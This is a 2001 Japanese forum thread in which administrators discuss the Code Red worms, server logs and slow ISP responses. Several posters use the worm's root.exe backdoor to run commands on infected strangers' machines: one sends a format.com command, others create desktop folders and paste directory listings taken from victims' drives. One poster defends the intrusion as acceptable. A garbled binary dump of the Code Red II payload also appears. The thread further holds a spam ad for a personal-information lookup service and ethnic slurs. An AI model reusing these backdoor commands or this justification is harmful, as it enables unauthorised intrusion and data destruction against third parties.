シマンテクのセキュリティ情報のページが逝ってる
474名無しさん@お腹いっぱい。:2001/08/12(日) 00:20
で、実際にバックドアから侵入してお宝AVやMP3やエミュ頂いたり、format C:\したり、デスクトップ書き換えたりした勇者はいるんですか?
475sage:2001/08/12(日) 00:21
勇者なんすか?それ。
476名無しさん@お腹いっぱい。:2001/08/12(日) 00:22
勇者と言うより、単なる無知なハッカー気取り
477名無しさん@お腹いっぱい。:2001/08/12(日) 00:23
まぁ、そういう奴が居ないと、その恐ろしさが解らないのも情けない話でな。
478名無しさん@お腹いっぱい。:2001/08/12(日) 00:25
>>387
ログオンログ以外にも肝心なとこにはオブジェクトアクセスも記録されているかと思われ
479名無しさん@お腹いっぱい。:2001/08/12(日) 00:27
dionは本当お気楽ゴンタ君な管理者なんだろうなあ。散々警告してんのに一向に止まないし、返事も来ない。
担当者はお盆休みだろうか?
480名無しさん@お腹いっぱい。:2001/08/12(日) 00:28
>ログオンログ
匿名ですやん。

>オブジェクトアクセス
それは何ですか?
481名無しさん@お腹いっぱい。:2001/08/12(日) 00:28
.kr .hk遮断で9割カット可(藁
482名無しさん@お腹いっぱい。:2001/08/12(日) 00:30
ただいま季節はずれのNNNがカナダよりご到着です。
483名無しさん@お腹いっぱい。:2001/08/12(日) 00:31
お気楽ゴンタ君って、できるかな、のゴンタくんですか?
ぼ、ぼくファンですぅ。
484名無しさん@お腹いっぱい。:2001/08/12(日) 00:33
すまん7/22ごろから1日も欠かさずいらっしゃてる野郎の
regedit.exe起動して・・・以下省略
485名無しさん@お腹いっぱい。:2001/08/12(日) 00:34
>>484
ソレいいね。
486名無しさん@お腹いっぱい。:2001/08/12(日) 00:38
ベリベリナイスな攻撃方法を考えたなり。
IE起動してブラクラページに飛ばすなり。
これでそのサーバはご臨終なりYO。
487名無しさん@お腹いっぱい。:2001/08/12(日) 00:40
>>486
ブラウザ使ってるわけじゃないんで・・・
488名無しさん@お腹いっぱい。:2001/08/12(日) 00:41
相手のディスプレイにregeditの窓は開かないのかな
489え〜ん:2001/08/12(日) 00:42
>>488
多分開くと思うyo
490名無しさん@お腹いっぱい。:2001/08/12(日) 00:42
>>479
DIONって回線を他のプロバイダーに卸しているから、DION自体では
把握できないのかも?
例えばここのアクセスポイントの電話番号をgoogleで検索してみると。
http://www.dion.ne.jp/dialup/service/bari/ap_siyou/tky_tokyo4.html
こんな結果になる。
http://www.google.com/search?q=%2203-5205-8501%22&btnG=Google+%8C%9F%8D%F5&hl=ja&lr=
491まだCodeRed知らない馬鹿もいるからage:2001/08/12(日) 00:47
やっぱり自動浸入ツールで1000超えたとか俺は2000とか自慢してる所もあってさらに最悪な状態です。
って言うかもう飽きたとか言える人は本当に平和だ。
NT対応版とかも出そうなのに。
みんながみんなCodeRedの雑音は塞げばいいってもんじゃないだよおー。
いつまで秒単位で来るんだよー。
492え〜ん:2001/08/12(日) 00:55
寝る

♥♥♥ここで寝る♥♥♥
493名無しさん@お腹いっぱい。:2001/08/12(日) 01:01
>>491
ネットワーク屋さん?
494名無しさん@お腹いっぱい。:2001/08/12(日) 01:06
*.ppp.dion.ne.jp - - [12/Aug/2001:01:04:49 +0900] "GET /default.ida?XX
495名無しさん@お腹いっぱい。:2001/08/12(日) 01:06
>>490
それは目からうろこ。
の割にはサポートの対応は無知無能だったな
496名無しさん@お腹いっぱい。:2001/08/12(日) 01:14
>>495
検索結果のプロバイダー料金見てみると一律って訳じゃないから、
大きな声で言えないんじゃない?
で、サポートに「のらりくらり」対応させていると。
まぁ推測だけどね。
497名無しさん@お腹いっぱい。:2001/08/12(日) 01:19
>>482
うちはスウェーデンから来るようになったよ。

>>488
regeditってコマンドラインでも使えるよ。
regedt32.exeの方がセキュリティまでいじれるね、
498厨房共出番だぜ:2001/08/12(日) 01:33
499名無しさん@お腹いっぱい。:2001/08/12(日) 01:38
>>498
普通start使うだろ。
500日の丸:2001/08/12(日) 01:45
既出ですが、日本列島だけがまったく見えない!
ttp://www.security.nl/misc/codered-stats/geodist.html
501名無しさん@お腹いっぱい。:2001/08/12(日) 01:59
>>500
韓国のせいで見えないんじゃないの?
502名無しさん@お腹いっぱい。:2001/08/12(日) 02:02
>>500
 私はIE使ってるもんで何も見えない。
503日の丸:2001/08/12(日) 02:07
カキコしてから↓のようなスレに気づいた
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996999178
よく見ると台湾も赤い丸のなかに含まれてるけどね。
アクセスログから調べてみると、
圧倒的に中韓の鯖から伝染させようとしているのは確か。
504日の丸:2001/08/12(日) 02:22
>>502
URL先がJAVAアプレット使ってるから見えないのかな?
ttp://www.security.nl/misc/codered-stats/geodist.gif
だと見えるかも。
もともと赤い国旗の中国の主要地域も赤丸のなかに入っているね。
最近ウチにくるアクセスログをAPACHE立ち上げてみたら
Code Red II だけだけれど。
505名無しさん@お腹いっぱい。:2001/08/12(日) 03:02
中韓のサーバも相当やられてますね。
なんかまだ知らない人もいるようだけど、最初のホワイトハウス狙いの中国製CodeRedにキレたアメ公が、
中国にCodeRed IIで報復攻撃したのはLANG見て中国版OSだけ倍の600スレッド生成してるとこなんか見てもほぼ当たりだろ。
しかもアメ公はジャップとチャイニーズの区別なんかつかないからとりあえずYellowを標的にしてあって近隣諸国はいい迷惑だよ。
マジアメ公を怒らせると怖いわ。
506名無しさん@お腹いっぱい。:2001/08/12(日) 03:20
アクセスしてきたIISに逆に侵入してCodeRedのコードを潰すカウンターワームって出来んのかいな?
CodeRedが感染したんだから、同じ方法で侵入は出来るんっしょ?
507名無しさん@お腹いっぱい。:2001/08/12(日) 03:26
Microsoft、自社パッチを当てずに「Code Red」に感染
508名無しさん@お腹いっぱい。:2001/08/12(日) 03:27
なんかスレ1に戻ってしまったような気がするのは私だけだろうか。
509名無しさん@お腹いっぱい。:2001/08/12(日) 03:28
ワームが研究された目的は本来それだったそうです。
できるならやってください。
でも後でモメるとめんどいかもよ、バグあったらどーすんだ、とか
510名無しさん@お腹いっぱい。:2001/08/12(日) 03:59
CATVの感染率が大体0.04%ぐらいだったからそれを元にすると実質接続台数1200万(少ないか?)として国内での感染は5000ぐらいとなる計算。
511名無しさん@お腹いっぱい。:2001/08/12(日) 04:18
>>490
見てたんだけど、下は1000/月から一万円越えるところまで、色々あるねぇ。
同じ回線でこうも値段違うと高いところ使ってる奴はただのお馬鹿さんだな。
あと、殆どのプロパがコードレッドの警告を出してないってのも気になる。
512510:2001/08/12(日) 04:27
0.04%はクラスBの空間での割合なのでグローバルIP空間ではその倍ぐらいはあるかもしれません。
513名無しさん@お腹いっぱい。:2001/08/12(日) 04:50
>>510
IISって600万台でなかったか?
514名無しさん@お腹いっぱい。 :2001/08/12(日) 06:17
CodeRedWatcher VER002 ニダ  AM4:20-AM6:10
[2001/08/12 4:24:59] CodeRed Type XXXXX from: 210.97.85.*** /
[2001/08/12 4:29:19] CodeRed Type XXXXX from: 195.55.50.*** /
[2001/08/12 4:31:48] CodeRed Type XXXXX from: 210.123.36.** /
[2001/08/12 4:49:53] CodeRed Type XXXXX from: 210.127.88.* /
[2001/08/12 5:08:34] CodeRed Type XXXXX from: 210.106.239.*** /
[2001/08/12 5:14:26] CodeRed Type XXXXX from: 210.42.160.** /
[2001/08/12 5:14:42] CodeRed Type XXXXX from: 210.14.244.** /
[2001/08/12 5:33:13] CodeRed Type XXXXX from: 210.14.248.** /
[2001/08/12 5:41:27] CodeRed Type XXXXX from: 210.41.195.** /
[2001/08/12 5:55:40] CodeRed Type XXXXX from: 210.78.134.*** /
[2001/08/12 5:55:45] CodeRed Type XXXXX from: 210.65.224.** /
[2001/08/12 6:01:51] CodeRed Type XXXXX from: 210.55.75.** / l75-25.world-net.co.nz
515おはよう@お腹いっぱい:2001/08/12(日) 06:28
ところでホワイトハウスの攻撃で、いちいちIPを変えたとか対策いってるが、ドメイン、ホスト名でしかけられていたらどうするつもり仮名。IIってどうなんだろうと気になる。
516名無しさん:2001/08/12(日) 07:06
韓国ドメインからのサイバーデモの警告
https://www.netsecurity.ne.jp/article/1/2637.html
517え〜ん:2001/08/12(日) 07:46
おはよう
518ISDN64k:2001/08/12(日) 09:19
うぐ・・・今日も重いのぅ・・・
519名無しさん@お腹いっぱい。:2001/08/12(日) 11:15
>>506
前になんかのセキュリティーホールを潰すワーム書いた人は
捕まっちゃったみたいですよ。
今回のはモニターしてれば感染IPがわかるから効率的にやれる
と思うんだけどでてこないのがちょっと不思議な気がする。
520名無しさん@お腹いっぱい。:2001/08/12(日) 11:43
>>515
 IIはホワイトハウスを攻撃する機能は無いとどっかで
 読んだような気がする。
 一方IPアドレス直じゃなく名前解決するVerがあると
 いうのもどっかで読んだ気がするけど、これはCode redの
 亜種の事だったかもしれない。
Wakwakのダイヤルアップから攻撃来たのでメールしたら1時間で回答が
来た。お盆の日曜だってのに大変だねサポートの人。ダイヤルアップ
だから大丈夫なんて戯言言ってた厨房氏ね。

> この度は、ご連絡頂きまして誠にありがとうございます。
> ご連絡頂きました情報を元に、該当すると思われる会員を特定致しま
>した。当該の会員へはこちらより事実確認、注意喚起等を行わせて頂き
>ます。
522名無しさん@お腹いっぱい。:2001/08/12(日) 11:59
きっと、もうツールが整ったんだろうね。
日付と時間、IPアドレス入れてポチっとな、
でチェックして、さらにポチッとなで警告メール発信とか。
523名無しさん@お腹いっぱい。:2001/08/12(日) 12:13
しかし、うちのCATVの場合は、プロバイダの本社がやられて
いる。どうせ土日は思いっきりのんきに過ごしてんだろうな。
ユーザからは1件もアタック来ないのになあ。

鬱だ。>icc.ne.jp
524名無しさん@お腹いっぱい。:2001/08/12(日) 12:25
氏萬テクのセキュリティ情報が逝ってるように見えるのは俺だけかな
http://www.symantec.com/region/jp/index.html
525名無しさん@お腹いっぱい。:2001/08/12(日) 12:31
逝ってる・・・なつかしいあのころ(大雪がたいへんで・・
)
526名無しさん@お腹いっぱい。:2001/08/12(日) 13:35
田舎に残してきたお母さん。
呉々もCodeRedにはお気を付けて。
527名無しさん@お腹いっぱい。:2001/08/12(日) 13:45
韓国の管理者にmailして返事帰ってきた人っている?
毎日ログ見るのが疲れる。増えてるような気もするよ
528名無しさん@お腹いっぱい。:2001/08/12(日) 14:15
kr とかでは話題になってないのかいな?
一般向けニュースでなくても、
インターネット関係のニュースぐらいは…
529名無しさん@お腹いっぱい。:2001/08/12(日) 14:20
気にしていないみたいだよ。ハン板に来た韓国人に聞いたら感染数10
とか逝っていた。つーか事態を理解していないようだね。
530名無しさん@お腹いっぱい。:2001/08/12(日) 14:45
赤虫はNT系以外のユーザーには関係ナスなんでパニック起こさない配慮してるんじゃないの?
531名無しさん@お腹いっぱい。:2001/08/12(日) 14:46
>>358のスクリプトは動くんですか?
532名無しさん@お腹いっぱい。:2001/08/12(日) 18:20
ダイアルアップ厨房ウザイのでISPにログ付けてメールした返事。

Date: Sun, 12 Aug 2001 12:13:55
>今回お送り頂きましたログを弊社にて精査し、不正なアクセスと認められた
>場合は会員規約に則り、然るべき対処をさせて頂きます。

「不正なアクセスと認められた場合」って、そう言う問題なのか?
なんか対応がぬるいような気がするんだが、日曜&お盆返上なんだろうなぁ。
そう思うとちょっと、かわいそうな気がする。>管理者
533名無しさん@お腹いっぱい。:2001/08/12(日) 18:24
Logを取っていたとしても、時刻をNTPと同期させていなければ信用性は
ガタ落ち。
534名無しさん@お腹いっぱい。:2001/08/12(日) 18:35
さくら時計はと〜っても便利!!!
時刻合わせもワンタッチ。(ノータッチ?)
みなさんも使いましょうね(^^)
535名無しさん@お腹いっぱい。:2001/08/12(日) 18:50
前までアタック?があったらびびって接続切ってたが
今では気にしなくなった。
レッドたんのおかげ。
536名無しさん@お腹いっぱい。:2001/08/12(日) 18:53
>533
SNTP立ててるよーん。

以前は無かった。知らないと言うのは恐ろしい>オレ
537名無しさん@お腹いっぱい。:2001/08/12(日) 19:00
朝日にチクったらこんな返事来た。

>ご連絡ありがとうございます。
>ご連絡いただきました情報をもとに調査し、
>該当ユーザーに対してASAHIネット会員規約に基づき対処を
>とりましたことをご連絡いたします。

退会となっても俺のせいじゃないからな
538え〜ん:2001/08/12(日) 19:06
539名無しさん@お腹いっぱい。:2001/08/12(日) 19:09

なんかすばらしい板だな
540名無しさん@お腹いっぱい。:2001/08/12(日) 19:11
今回のXXXXバージョンは210.x.x.xを重点に攻撃するようになって
いたけど、これが全ネットワークを無差別に攻撃する仕様だったら
どんなに恐ろしいことになっていたのだろうか・・・

そういう風に改造された新バージョンがでる日も近いかな・・・
541名無しさん@お腹いっぱい。:2001/08/12(日) 19:19
違うよ。IP的に近所をねらう確率が高いだけだよ。
詳しくは過去ログよんでね。
542え〜ん:2001/08/12(日) 19:35
いま某国営放送の人とコンタクトとったYO
まだ企画段階のようだにゃ。
543名無しさん@お腹いっぱい。:2001/08/12(日) 20:17
jsat-sv1.jsat.ne.jpんとこの、www.jsat.ne.jpって改竄されてない?

おまけにここにアクセスしたら、ns1.jsat.ne.jpが
ポート113をバンバン叩いてくるようになってしまった。
鬱だ…
544名無しさん@お腹いっぱい。:2001/08/12(日) 20:34
以前はさくら時計使ってたけど、今はAdjustPC。こっちのが便利よ。
545名無しさん@お腹いっぱい。:2001/08/12(日) 20:49
>>540
キミはわかってない。
546名無しさん@お腹いっぱい。:2001/08/12(日) 20:57
いまだに>>540みたいな事言ってる奴が居るから、
CodeRedは完全に駆逐されないんだろうな。
547名無しさん@お腹いっぱい。:2001/08/12(日) 21:22
>>540
CERT の document 位読めよ阿呆。
548名無しさん@お腹いっぱい。:2001/08/12(日) 21:23
>>547
CERT の document じゃなくて……こんなんじゃないの?
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html
549名無しさん@お腹いっぱい。:2001/08/12(日) 21:26
無差別に攻撃するのが
初期型(NNNN)じゃなかったっけ?
550名無しさん@お腹いっぱい。:2001/08/12(日) 21:38
あまりにもうざいので
http://****.jp/scripts/root.exe?/"c:\winnt\system32\format.com"
させていただきました。
合掌
551名無しさん@お腹いっぱい。:2001/08/12(日) 21:41
>>550
パラメータが足りないと思うのですが、優しさですか?
552名無しさん@お腹いっぱい。:2001/08/12(日) 21:41
>>551
ばれた?
553550:2001/08/12(日) 21:43
正しいのかかないでね♥
554名無しさん@お腹いっぱい。:2001/08/12(日) 21:43
>>552
素敵です。
555名無しさん@お腹いっぱい。:2001/08/12(日) 22:28
今起きてる2ちゃんのクッキートラブルって...
実は61のIPアドレス弾いてるの?
556名無しさん@お腹いっぱい。:2001/08/12(日) 22:29
ルータが感染してた。
でもこれどーやって駆除するのだろうか?
うーん…。まあ実害無いし放っておくか。オレの管理下じゃ無いし(藁
557ちょっと沈静化してきたかな:2001/08/12(日) 22:30
最近Firewallのログが40%ほど減った。やや治まりつつあるみたい。
でも、明日からどうなるかは誰にもわからない・・・。
558名無しさん@お腹いっぱい。:2001/08/12(日) 22:41
あ〜明日出勤したらNTサーバー見に逝かないといけない。
今は社内ネットワークと切り離してインターネット専用にしてるから
実害はないと思うんだが。
559名無しさん@お腹いっぱい。:2001/08/12(日) 22:43
何言ってるの?全然分からん。
560名無しさん@お腹いっぱい。:2001/08/12(日) 22:55
ルーター用途に余計なものインストロールするなよろし
561名無しさん@お腹いっぱい。:2001/08/12(日) 22:57
今日はしみじみ君来ないのかな。
なんか、しみじみ君を見ないと一日が終わらない感じだけど、
今日は遊びつかれたので寝ます。お休み。
562名無しさん@お腹いっぱい。:2001/08/12(日) 22:59
>>558
つまり、社内ネットワークが無事なら社外に迷惑かけても良い訳ね。
腐っているな。
563名無しさん@お腹いっぱい。:2001/08/12(日) 23:09
>>538
違うの作ったの?
564名無しさん@お腹いっぱい。:2001/08/12(日) 23:36
ちくりの回答

><回答>
>弊社サポート部署におきましても、「CodeRed」に感染された
>方からのアタックを受けているとのお問い合わせが多く、
>お客様には御注意して頂けます様、弊社ホームページ上にて、
>ご案内をさせて頂いております。

>詳細につきましては、下記URLをご確認頂けますでしょうか。

なんで俺がご確認しなきゃいけねーんだ(怒)
565名無しさん@お腹いっぱい。:2001/08/12(日) 23:37
CodeRed君を沢山送り込もうとしているhi-hoからお返事きません。
誰か返事きた?
566名無しさん@お腹いっぱい。:2001/08/12(日) 23:37
で、下記URLの中身

7月に発見されたウィルス2種が大流行しております。
これらは、見知らぬ人たちから届いたメールに添付されているファイルを開いて感染するウィルス(W32/Sircam)、マイクロソフト社のIISサーバのセキュリティホールを突かれて感染するウィルス(Code Red)で、どちらも感染力が非常に強く、感染している事も気づきにくいとても危険なウィルスです。
感染した場合「全てのインターネットユーザーの皆様に迷惑をかけてしまう」事になりますので、Windowsパソコンをご利用のお客様は以下を参考の上、感染確認・駆除にお役立て下さい。
また、インターネットライフを楽しむためにも、日常お使い頂く時の注意をご参考ください。


ものすごく頓珍漢な気がするのは俺だけか?
567名無しさん@お腹いっぱい。:2001/08/12(日) 23:38
○DNからか?
568名無しさん@お腹いっぱい。:2001/08/12(日) 23:39
さらに下記URL

■Code Red.C(コードレッド)
マイクロソフト社のWindows NT Server 4.0 / Windows 2000 ServerのWebサーバであるIISサーバのセキュリティホールを利用し、ウイルスを拡散します。
セキュリティホールを発見すると他のIISサーバに感染を広げたり、不正アクセス、Web改ざん等を行ないます。
被害を防ぐために、マイクロソフト社の提供するセキュリティパッチをダウンロードし実行願います。


対策・・・
569名無しさん@お腹いっぱい。:2001/08/12(日) 23:40
>>568
超DQNな対策ですね
570名無しさん@お腹いっぱい。:2001/08/12(日) 23:43
(省略)/scripts/root.exe?/"mkdir C:\DOCUME~1\ALLUSE~1\デスク~1\CodeRedUに感染しています!!"
すみません↑これで合っていますか?
571名無しさん@お腹いっぱい。:2001/08/12(日) 23:44
572名無しさん@お腹いっぱい。:2001/08/12(日) 23:57
c+が抜けてました
573名無しさん@お腹いっぱい。:2001/08/13(月) 00:00
あまり広めないでください。
574え〜ん:2001/08/13(月) 00:07
Directory of c:\

2001/08/12 00:02 <DIR> CodeRedUに感染しています!!
2001/08/02 12:21 22 CONFIG.SYS
2001/08/01 17:05 <DIR> docu20
2001/08/01 16:44 <DIR> Documents and Settings
2001/08/05 10:00 <DIR> HISAGO
2001/08/01 16:28 <DIR> Inetpub
2001/08/06 12:20 <DIR> MDRJR
2001/08/02 11:13 <DIR> MSSQL7
2001/08/09 13:43 <DIR> My Music
2001/08/04 19:09 <DIR> Parts1
2001/08/06 15:11 4,824 PartsIni.Sys
2001/08/09 13:43 <DIR> Program Files
2001/08/10 18:08 <DIR> WINNT
2001/08/10 18:08 <DIR> プリンタードライバー
2 File(s) 4,846 bytes
12 Dir(s) 1,244,385,280 bytes free
575え〜ん:2001/08/13(月) 00:08
>>563
ちょっとへたれですが。
576え〜ん:2001/08/13(月) 00:10
>>570
こうやって使いますが、気づきにくいようにc:\でした。
577名無しさん@お腹いっぱい。:2001/08/13(月) 00:31
>>574
>2001/08/02 11:13 <DIR> MSSQL7
おっおいしそう。ジュル
578名無しさん@お腹いっぱい。:2001/08/13(月) 00:36
とりあえずうちに来るやつは減少傾向です。
http://www.kondo.homeip.net/codered.html
このまま消えていくんだろうか?
それとも、盆明けに復活だろうか
579え〜ん:2001/08/13(月) 00:56
Directory of c:\

2001/08/02 12:21 22 CONFIG.SYS
2001/08/01 17:05 <DIR> docu20
2001/08/01 16:44 <DIR> Documents and Settings
2001/08/05 10:00 <DIR> HISAGO
2001/08/01 16:28 <DIR> Inetpub
2001/08/06 12:20 <DIR> MDRJR
2001/08/02 11:13 <DIR> MSSQL7
2001/08/09 13:43 <DIR> My Music
2001/08/04 19:09 <DIR> Parts1
2001/08/06 15:11 4,824 PartsIni.Sys
2001/08/09 13:43 <DIR> Program Files
2001/08/10 18:08 <DIR> WINNT
2001/08/10 18:08 <DIR> プリンタードライバー
2 File(s) 4,846 bytes

Directory of c:\inetpub\scripts

File Not Found

いたづらのあとは元に戻しましょう!
580え〜ん:2001/08/13(月) 00:59
Directory of c:\

2000-04-18 18:38 2,526 FRUNLOG.TXT
2000-04-18 18:27 <DIR> WINDOWS
2001-03-02 21:52 1,204 SETUPXLG.TXT
2000-06-23 11:14 1,247 SCANDISK.LOG
2000-05-12 10:07 <DIR> ThinkPad
2000-05-12 10:10 <DIR> CDROM
2000-05-12 10:27 <DIR> ICONS
2000-04-18 18:36 <DIR> IBMTOOLS
2000-04-18 18:37 2,164 PDOS.DEF
2000-04-18 18:27 <DIR> Program Files
2000-04-18 18:49 <DIR> My Documents
2000-05-18 10:57 225 RESETLOG.TXT
2001-03-03 01:09 18,043 DMapLogF.txt
2001-03-03 01:09 10,101 DMapLogE.txt
2000-07-12 19:32 <DIR> My Music
2001-04-30 10:44 <DIR> PEPTESTS
2001-05-01 10:28 <DIR> Transcender
2000-05-22 17:42 0 logwmemory.bin
2001-07-21 14:28 <DIR> unzipped
2001-07-22 12:56 <DIR> Downloads
2001-07-23 11:22 10 lightsave.txt
9 File(s) 35,520 bytes
12 Dir(s) 172,818,432 bytes free


Directory of d:\

2001-03-03 01:26 <DIR> WINNT
2001-03-03 01:30 <DIR> Documents and Settings
2001-03-03 01:31 <DIR> Program Files
2001-03-03 01:41 <DIR> Inetpub
2001-06-21 08:37 160,008,939 寇帷雇C.rm
2001-06-21 03:18 143,392,368 寇帷雇B.rm
2001-06-21 04:32 111,501,124 寇帷雇A.rm
3 File(s) 414,902,431 bytes
4 Dir(s) 683,261,952 bytes free

こいつうぜぇ
581名無しさん@お腹いっぱい。:2001/08/13(月) 01:02
うざいからって侵入してもいいんですか?
582え〜ん:2001/08/13(月) 01:03
>>581
偶然入ってしまったんだからOK
583名無しさん@お腹いっぱい。:2001/08/13(月) 01:06
>>582
・・・あなたメディアに露出するんですよね?
K察が張っているとまずいことになるのでは?
584名無しさん@お腹いっぱい。:2001/08/13(月) 01:06
>>581
えっつ?そーゆうサービスをしてるサーバーなんでしょ。
585名無しさん@お腹いっぱい。:2001/08/13(月) 01:09
某大手電機機メーカー曰く。
ファイアーウォールがあるから安心なのに
感染しちゃったから
ウィルスバスターで駆除するように通達した。

という話を聞きました。
鬱だ。
586名無しさん@お腹いっぱい。:2001/08/13(月) 01:10
本物のえ〜んとはかぎらんけどね
587名無しさん@お腹いっぱい。:2001/08/13(月) 01:12
どうでもいいから 見えない串出さんかい
588名無しさん@お腹いっぱい。:2001/08/13(月) 01:14
ま ファイヤーウォールには ラーメンやね
589WIZ:2001/08/13(月) 01:14
でした っと
590名無しさん@お腹いっぱい。:2001/08/13(月) 01:23
今回のばやいファイヤウォールがお亡くなりになった
ケースがあった。ボックス物のやつだけど
591000:2001/08/13(月) 01:23
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
592名無しさん@お腹いっぱい。:2001/08/13(月) 01:25
正直コードレッド自体より、
コードレッド関連のクソ晒しスレが一番ウザイ
593え〜ん:2001/08/13(月) 01:29
漏れってなんか書いた方がいいの?
594名無しさん@お腹いっぱい。:2001/08/13(月) 01:30
そろそろネタが尽きてきたってことでひとつ
595え〜ん:2001/08/13(月) 01:33
え〜んってだれ?
596え〜ん:2001/08/13(月) 01:39
ここは2ちゃんだし、しゃあないか。
597名無しさん@お腹いっぱい。:2001/08/13(月) 01:40
知らない\e
598名無しさん@お腹いっぱい。:2001/08/13(月) 01:45
>>592
感染してるのに、管理者にチクってるのに、注意するとほざいてるのに、毎日100アクセスもしてくるd○onのDQN市ね
599名無しさん@お腹いっぱい。:2001/08/13(月) 01:54
600名無しさん@お腹いっぱい。:2001/08/13(月) 02:08
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/tools/redthree.asp
どゆこと?
パッチに不備があって、実はパッチ当ててもダメでしたって事ですかね。
601ブラックリスト:2001/08/13(月) 02:12
騙された・捨てられた・弄ばれた・相手に誠意がない・債権トラブル・不倫疑惑・証拠が欲しい・
電話番号などから住所などの詳細を調べて欲しい・等など
何でも気軽に相談下さい。確実に貴方の悩みや困り事、トラブル等を迅速に解決致します。
i-mode・j-sky対応
http://www.black-893.com
602名無しさん@お腹いっぱい。:2001/08/13(月) 02:12
マイクロソフトのサイト落ちてる?
603名無しさん@お腹いっぱい。:2001/08/13(月) 02:14
ごめん大丈夫だった。
604名無しさん@お腹いっぱい。:2001/08/13(月) 02:22
バックドアをしかける場所ランダムにするような変種ってないのかな
605名無しさん@お腹いっぱい。:2001/08/13(月) 02:31
>>599
ものすごく気色わるいホスト名なんだけど大丈夫?
606名無しさん@お腹いっぱい。:2001/08/13(月) 02:43
>>600
 過去ログって読まない人?
607名無しさん@お腹いっぱい。:2001/08/13(月) 02:43
こんなの来てたYO!
sales-info.cisco.com - - [13/Aug/2001:02:24:41 +0900] "GET /default.ida?XXXX(以下略

この会社は対策してないのかよ・・・それともパッチする前に接続して即感染か。
608名無しさん@お腹いっぱい。:2001/08/13(月) 02:44
>>607
シスコね。結構前からきてる。
609名無しさん@お腹いっぱい。:2001/08/13(月) 04:17
あの、いつ絶滅するんですか?
9月末日までは無理でしょうか?
610天職組@お腹へった。 :2001/08/13(月) 04:23
>>609

絶滅は せんのちゃうかな。。。
つーーーか 9月末に なんか あるのかな?



  
611名無しさん@お腹いっぱい。:2001/08/13(月) 04:48
>>607
つながらない。
612名無しさん@お腹いっぱい。:2001/08/13(月) 05:32
はー(ため息)
ちょっと前に知人のHPで、CRUの話題振って、
さっき見に行って唖然。

知らなかった、日本でも影響あるの?   って呑気な人やら
個人レベルでは防ぎようがないですね    なんて言ってるヴォケやら
挙げ句に、ワームって虫のことでしょ?飼ってみたら案外かわいいんじゃない?

現実ってこんなもんなのか? 
613名無しさん@お腹いっぱい。:2001/08/13(月) 06:03
えらいねぇ〜

Directory of d:\Please Read!!!Please Read!!!Please Read!!!

2001-08-09 10:33p <DIR> .
2001-08-09 10:33p <DIR> ..
2001-08-09 10:33p <DIR> Hi! I'm a Japanese networker
2001-08-09 10:33p <DIR> I discovered your computer has been infected with the CodeRed virus
2001-08-09 10:33p <DIR> You'd better do something right now!
0 File(s) 0 bytes
5 Dir(s) 9,586,565,120 bytes free
614名無しさん@お腹いっぱい。:2001/08/13(月) 06:09
>>610
Code Red II に限っていえば、2001年10月1日以降は繁殖しない。
バックドアとトローイは残るけど。
615名無しさん@お腹いっぱい。:2001/08/13(月) 06:10
Logにこんなの引っ掛かってたよ

ネネ `・ フ・dg�6 dg・ 鞜 h 劫\���P�U恪・���P�U・@・燕X����U・ 斑= 版
ヘカノ燕T���丘×0・ ・ ヌF0・ ・
CodeRedII ・$�Uリf タ腐8���ヌ・��� j 劫P���P
劫8���P畿�p�推 ス8���thS�Uヤ�U・E・スT���, ・, 靨 ッヌ宇4孔・j �u・ ・
���j j �U�UミOuメ・ iスT��� \&・ \&W�U鑠 j�U桂��U齏F4)E・d�U闕・���P�Uタキ・���=メ sマキ・���・
sテfヌ・��� fヌ・��� P鐡 往t���j jj�Uク・�tEjTh~f�u�U、Yj劫p���P�u�Uーサ タtK3ロ�U・3' u?ヌ・���
ヌ・��� ヌ・��� 畿怨d���劫h���Pj 劫`���Pj j�U�屠 Th~f�u�U、Y・u1 X-モ
j h・ P�u�Uャ=・ uj j劫\���P�u�Uィ�u�Uエ鱸���サ ゚w・  ・ xuサ `・ 掬$
dg・ Xa・dg�6 dg・ f・MZu繼K<・ PE uラ亀 xモ毅 ・KERNuナ−EL32uサ3ノI脚 Aュ・
GetPu|rocAu・JIム・J$キ チ・J・ テ吋$$dg・ Xaテ鏖���云・E
LoadLibraryA �
u・UE
CreateThread �u・UE
GetTickCount �u・UE・ Sleep �u・UE韋
GetSystemDefaultLangID �u・UE蒻 GetSystemDirectoryA �u・UE琲
CopyFileA �u・UEワ・ GlobalFindAtomA �u・UEリ・ GlobalAddAtomA �u・UEヤ・
CloseHandle �u・UEミ・ _lcreat �u・UEフ・ _lwrite �u・UEネ・ _lclose �
u・UEト・ GetSystemTime �u・UEタ・ WS2_32.DLL �UEシ・ socket �uシ�
UEク・ closesocket �uシ�UEエ・ ioctlsocket �uシ�UE、・ connect �uシ�
UEー・ select �uシ�UE�・ send �uシ�UEャ・ recv �uシ�UEィ・ gethostname �uシ�
UE懆 gethostbyname �uシ�UE倩 WSAGetLastError �uシ�UE碑 USER32.DLL �
UE占 ExitWindowsEx �u・UE古畿・タ・@右ы・xV4チタテ鞦���< t・�t竟���
旗韆���韓チ・鞋���旗靱���韓雍���・・ ���� ��� ��� ��� ��� �� �� ��Y・・リ#
・��� リ・t麾炙・拗���t津h 劫\���P�U熏シ\���・ \CMD.EXE ^・・、ウcj・
d:\inetpub\scripts\root.exe ・$・劫\���P�Uワj・ d:\progra~1\common~1\system\MSADC\root.exe
・$・劫\���P�Uワ霄 ・ZP    �� ク @
616614:2001/08/13(月) 06:13
補足。
2001年10月1日以降の場合、Code Red II によってマシンがリブート
されるので、絶滅することになる。
新たな新種が登場しなければだが・・・
617名無しさん@お腹いっぱい。:2001/08/13(月) 06:29
>>615をUNICODE変換すれば良いのか?
618名無しさん@お腹いっぱい。:2001/08/13(月) 06:38
やっぱり今までMS製OSの自粛に反対してきた自分勝手な馬鹿も今回の共犯者だよな。
最低でも企業や政府機関がMS製OS使ってたらそれだけでもう犯罪だよ。
MS製OSが職場にあると、知ったかぶりの初心者が必ず隠れていらんことするからな。
619名無しさん@お腹いっぱい。:2001/08/13(月) 07:19
>>615

